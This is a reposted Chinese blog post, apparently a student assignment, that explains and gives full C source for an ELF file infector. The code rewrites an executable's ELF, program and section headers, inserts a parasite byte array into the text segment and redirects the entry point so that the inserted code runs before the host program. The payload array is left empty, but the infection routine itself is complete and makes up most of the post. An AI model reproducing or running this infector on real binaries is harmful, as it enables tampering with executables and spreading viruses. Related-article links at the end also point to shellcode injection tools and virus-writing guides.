一个二进制代码注入器(用于感染ELF文件)(转)

最新推荐文章于 2024-06-12 09:49:58 发布
最新推荐文章于 2024-06-12 09:49:58 发布
阅读量1.5k 收藏 4
点赞数 2
文章标签: 编程
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Fangrn/article/details/83683344
版权

主要是修改ELF头结构以及段头结构,节头结构中的一些项,以达到插入病毒代码的目的。利用一段示例的二进制代码作为病毒进行演示。本次达到的目的是编程实现ELF文件感染器,并没有写出真正的病毒代码,只是实现第一部感染过程。使测试代码先于被感染的程序执行。

 
我们需要对ELF文件做的修改:
1 修正"ELF header"中的 e_shoff ,增加 PAGESIZE 大小
2 修正寄生代码的尾部,使之能够跳转回宿主代码原入口点 定位"text segment program header"
3 修正 "ELF header"中的 e_entry ,指向 p_vaddr + p_filesz
4 修正 p_filesz
5 修正 p_memsz
6 对于文本段phdr之后的其他phdr 修正 p_offset ,增加 PAGESIZE 大小
7 对于文本段的最后一个shdr 修正sh_size,增加寄生代码大小
8 对于那些因插入寄生代码影响偏移的每节的shdr 修正 sh_offset ,增加 PAGESIZE 大小
9 在文件中物理地插入寄生代码以及填充(确保构成一个完整页)到这个位置 text segment p_offset + p_filesz (original)。
 
代码: 
 

/*
ELF infector source file
Student:

Student ID:
Class:

*/

# include < stdio. h>
# include < stdlib. h>
# include < elf. h>
# include < sys/ types. h>
# include < sys/ stat. h>
# include < fcntl. h>
# include < string . h>

//Define PAGESIZE,default 4K byte

# define PAGESIZE 4096

//Parasite Virus Code.The code is copied from Internet.

char Virus[ ] ={/*Binary code for test*/} ;


int infect( char * ElfFile) ;
//The size of Virus Code
int VirusSize= sizeof ( Virus) ;

int jmppoint=/*Jump point of binary code of Virus*/;


//Infector Function

int infect( char * ElfFile)
{
    int result= 0;
    int Re;
    int FileD;
    int TmpD;
    int OldEntry;
    int OldShoff;
        int OldPhsize;
        int i= 0;

    Elf32_Ehdr elfh;
    Elf32_Phdr Phdr;
    Elf32_Shdr Shdr;
    
    //Open ELF file and read the elf header part to &elfh

    FileD= open ( ElfFile, O_RDWR) ;
    read ( FileD, & elfh, sizeof ( elfh) ) ;
    if ( ( strncmp ( elfh. e_ident, ELFMAG, SELFMAG) ) ! = 0)
        exit ( 0) ;

        //Old entry of original elf file

    OldEntry= elfh. e_entry;
        //Old section header offset of elf file

    OldShoff= elfh. e_shoff;
    
    //modify the Virus code line"movl "Oldentry",%eax" to jump to old entry

    //after the Virus code excuted

        * ( int * ) & Virus[ jmppoint ] = OldEntry;
    
    //Increase e_shoff by PAGESIZE in the ELF header

    elfh. e_shoff + = PAGESIZE;
        
    //if Virus Size is too large

    if ( VirusSize > ( PAGESIZE- ( elfh. e_entry% PAGESIZE) ) )
                exit ( 0) ;
    
    int Noff= 0;
    //The loop of read and modify program header

    for ( i= 0; i< elfh. e_phnum; i+ + )
    {
        
                //seek and read to &Phdr

     lseek( FileD, elfh. e_phoff+ i* elfh. e_phentsize, SEEK_SET ) ;
                read ( FileD, & Phdr, sizeof ( Phdr) ) ;
        if ( Noff)
        {
            //For each phdr who's segment is after the insertion (text segment)

            //increase p_offset by PAGESIZE                

            Phdr. p_offset + = PAGESIZE;

            //write back

            lseek( FileD, elfh. e_phoff+ i* elfh. e_phentsize, SEEK_SET ) ;
            write ( FileD, & Phdr, sizeof ( Phdr) ) ;
        }

        else if ( PT_LOAD = = Phdr. p_type & & Phdr. p_offset= = 0)
        {
            if ( Phdr. p_filesz ! = Phdr. p_memsz)
                exit ( 0) ;
            // Locate the text segment program header

         //Modify the entry point of the ELF header to point to the new

         //code (p_vaddr + p_filesz)

            elfh. e_entry = Phdr. p_vaddr + Phdr. p_filesz+ 4;
            lseek( FileD, 0, SEEK_SET ) ;
            
            //Write back the new elf header

            write ( FileD, & elfh, sizeof ( elfh) ) ;
            OldPhsize= Phdr. p_filesz;
            Noff= Phdr. p_offset+ Phdr. p_filesz;
            
            //Increase p_filesz by account for the new code (parasite)

            Phdr. p_filesz + = VirusSize;
            
            //Increase p_memsz to account for the new code (parasite)    

            Phdr. p_memsz + = VirusSize;
            
            //write back the program header

            lseek( FileD, elfh. e_phoff+ i* elfh. e_phentsize, SEEK_SET ) ;
            write ( FileD, & Phdr, sizeof ( Phdr) ) ;
        }
    }
    lseek( FileD, OldShoff, SEEK_SET ) ;

    //The loop of read and modify the section header

    for ( i= 0; i< elfh. e_shnum; i+ + )
    {

        lseek( FileD, i* sizeof ( Shdr) + OldShoff, SEEK_SET ) ;
        Re= read ( FileD, & Shdr, sizeof ( Shdr) ) ;
                
                if ( i= = 1)
        {
            //For the last shdr in the text segment

            //increase sh_size by the virus size    

            Shdr. sh_size + = VirusSize;
        }
                else if ( i!=0)
        {
            //For each shdr whoes section resides after the insertion

            //increase sh_offset by PAGESIZE                

            Shdr. sh_offset + = PAGESIZE;
        }
                        
        //Write Back

        lseek( FileD, OldShoff+ i* sizeof ( Shdr) , SEEK_SET ) ;
        write ( FileD, & Shdr, sizeof ( Shdr) ) ;

    }
        
    //To get the file size FileStat.st_size

    struct stat FileStat;
    fstat( FileD, & FileStat) ;

    char * Data= NULL ;
    Data= ( char * ) malloc ( FileStat. st_size- OldPhsize) ;

    lseek( FileD, OldPhsize, SEEK_SET ) ;
    read ( FileD, Data, FileStat. st_size- OldPhsize) ;

    //Insert the Virus Code to the elf file

    lseek( FileD, OldPhsize, SEEK_SET ) ;
    write ( FileD, Virus, sizeof ( Virus) ) ;
        char tmp[ PAGESIZE] = { 0} ;
    
    //Pad to PAGESIZE

        memset ( tmp, PAGESIZE- VirusSize, 0) ;
        write ( FileD, tmp, PAGESIZE- VirusSize) ;

    write ( FileD, Data, FileStat. st_size- OldPhsize) ;
    result= 1;

    free ( Data) ;

    return result;             
        
}

//Just for test

int main( int argc, char * * argv)
{
      //How to use it

      if ( argc!=2)
      {
        printf ( "Usage : infect <ELF filename>\n" ) ;
                exit ( 0) ;
      }
    
      int test = infect( argv[ 1] ) ;
      if ( test ! = 1)
      {
     exit ( 0) ;
      }
    return 0;
}
 
Fangrn
关注
  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
elf_inject:操作系统大作业:ELF文件注入
03-11
精灵文件注入 操作系统大作业 ⁠描述: 在Linux中修改一个现有的elf插入程序(替代没有源代码!例如如vi或其他如何自己编写的替换程序)。让该程序运行后先执行一个特别的附件功能(附加功能是:创建或注意:附加功能嵌入到原来的程序中,不是一个独立的程序!要求了解elf文件格式,另外建议使用汇编编程。 操作流程 测试用例介绍: 本elf注入的功能是在elf文件执行前,生成helloworld文件并写入内容:helloworld,之后再执行原elf文件功能 gcc main.c -o main # 生成注入函数 # 测试文件功能:打印 This is the program, whick will be injected.\n gcc test.c -o test # 生成测试elf文件 ./main test # elf注入 ./test # 执行注入后的elf文件 main.c中
第7题-ELF文件注入1
08-04
摘要:在Linux中下修改个现有的elf可执程序(显然没有源代码!譬如编写的个可以打印段字符串的可执程序)。让该程序运后先执个特别的附件功能(附加功能是:创建或
探秘0pack:优雅的ELF x64二进制注入工具
最新发布
gitblog_00054的博客
06-12 264
探秘0pack:优雅的ELF x64二进制注入工具 项目地址:https://gitcode.com/Luis-Hebendanz/0pack 在网络安全和逆向工程的世界中,工具的选择和利用往往能决定成功的关键。今天,我们要介绍的正是这样一款强大的工具——0pack。这是一个使用C++编写的ELF x64二进制payload注入,它巧妙地利用了LIEF库来实现shellcode的注入,让目标程序...
cpp-Mandibule是一个允许将ELF文件注入远程进程的程序
08-16
Mandibule是一个允许将ELF文件注入远程进程的程序
ElfWizard:将Shellcode注入ELF二进制文件的简单工具
02-21
精灵精灵 一个简单的工具,可将shellcode注入ELF二进制文件中。
Linux二进制分析:ELF 代码注入技术
lunan的博客
08-31 1585
Linux二进制分析:ELF 代码注入技术
BinExp:Linux二进制开发
02-03
2. **二进制格式**:理解ELF(Executable and Linkable Format)文件结构至关重要,它包含了程序的代码、数据、重定位信息等。理解段(sections)和节(segments)的概念有助于分析和修改二进制文件。 3. **缓冲区...
elf_hook_test:小精灵钩演示
07-04
ELF是Unix和类Unix系统(如Linux)中广泛使用的可执行文件、共享库和对象文件二进制格式。"小精灵钩"(Elf Hook)通常是指对ELF文件中的特定函数或地址进行挂钩(hook),以便在程序运行时监控或修改其行为。这种...
The ELF Resource Tools-开源
07-17
ELF(Executable and Linkable Format)是Unix系统及其类似操作系统,如Linux,广泛采用的一种二进制文件格式。它包含了程序的机代码、符号表、重定位信息等,使得编译、链接和加载能够正确处理程序的构建和...
C++课程设计综合题目.zip
12-31
"elf.cpp"这个文件名可能指的是一个ELF(Executable and Linkable Format)文件相关的项目,ELF是Unix和类Unix系统中常见的可执行文件和共享库格式。 在C++编程中,理解和处理ELF文件可以涉及以下几个关键知识点...
cerbero.zip
03-29
【cerbero.zip】是一个包含cerbero工具的压缩文件,该工具专为二进制分析而设计,具有强大的功能,能够帮助专业人士深入理解计算机程序的工作原理,尤其是在安全分析领域。cerbero具备反汇编文件格式查看的...
linux x86平台elf 进程注入so并且实现基于rel的hook ubuntu14.01测试通过
08-21
linux x86平台elf 进程注入so并且实现基于rel的hook ubuntu14.01测试通过
自己动手写病毒—ELF文件病毒
02-01
自己动手写病毒—ELF文件病毒,
代码注入的几种方法(源码 文档)
07-26
代码注入的几种方法,包括源码与文档。 想学代码注入的来啊
ELF格式可执行代码的嵌入
08-04
本文通过对linux中ELF文件格式的介绍,重点说明了程序在目标文件的嵌入方法
ELF文件感染
luohaoxiang2008的专栏
08-08 846
#include  #include  #include  #include  #include  #include  #include  #include  #define _ERROR_NULL(nRetCode)   if (!nRetCode) goto Exit0; #define _ERROR_OPEN(nRetCode)   if (nRetCode < 0) goto Exit0
UNIX ELF Parasites and virus(静态EFL文件注入
pany007的专栏
03-07 4369
UNIX ELF Parasites and virusSilvio Cesare silvio@big.net.au>October 1998 [also see: UNIX Viruses]INTRODUCTIONThis paper documents the algorithms and implementation of UNIX parasite and
ELF文件注入shellcode原理与实现
哆啦安全
01-15 2873
介绍 代码注入(英语:Code injection)是一种肇因于处理非法资料的电脑臭虫应用。代码注入可被攻击者用来导入代码到某特定的计算机程序,以改变程序的运行进程或目的。代码注入攻击的结果可以是灾难性的。 可执行与可链接格式(英语:Executable and Linkable Format,缩写为ELF),常被称为ELF格式,在计算机科学中,是一种用于可执行文件、目标文件、共享库和核心储(core dump)的标准文件格式。 1999年,被86open项目选为x86架构上...
链接(对ELF文件操作)
haosongmanzou的博客
05-06 365
链接简介
Linux逆向---可执行文件代码静态注入小实验
zekdot的博客
11-29 2112
分析完节头之后,我最大的收获就是,这么多的01,并不是所有的都是用来执行我写的那段输出helloworld的程序的,而且代码段中有很大一段空闲空间,这就给我们一个向可执行文件注入自己代码,然后通过修改程序逻辑达到让它去执行我们自己写的的部分的代码的逻辑的机会。 这里我们的源代码是这样的: 1 #include &lt;stdio.h&gt; 2 int main() 3 { 4 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值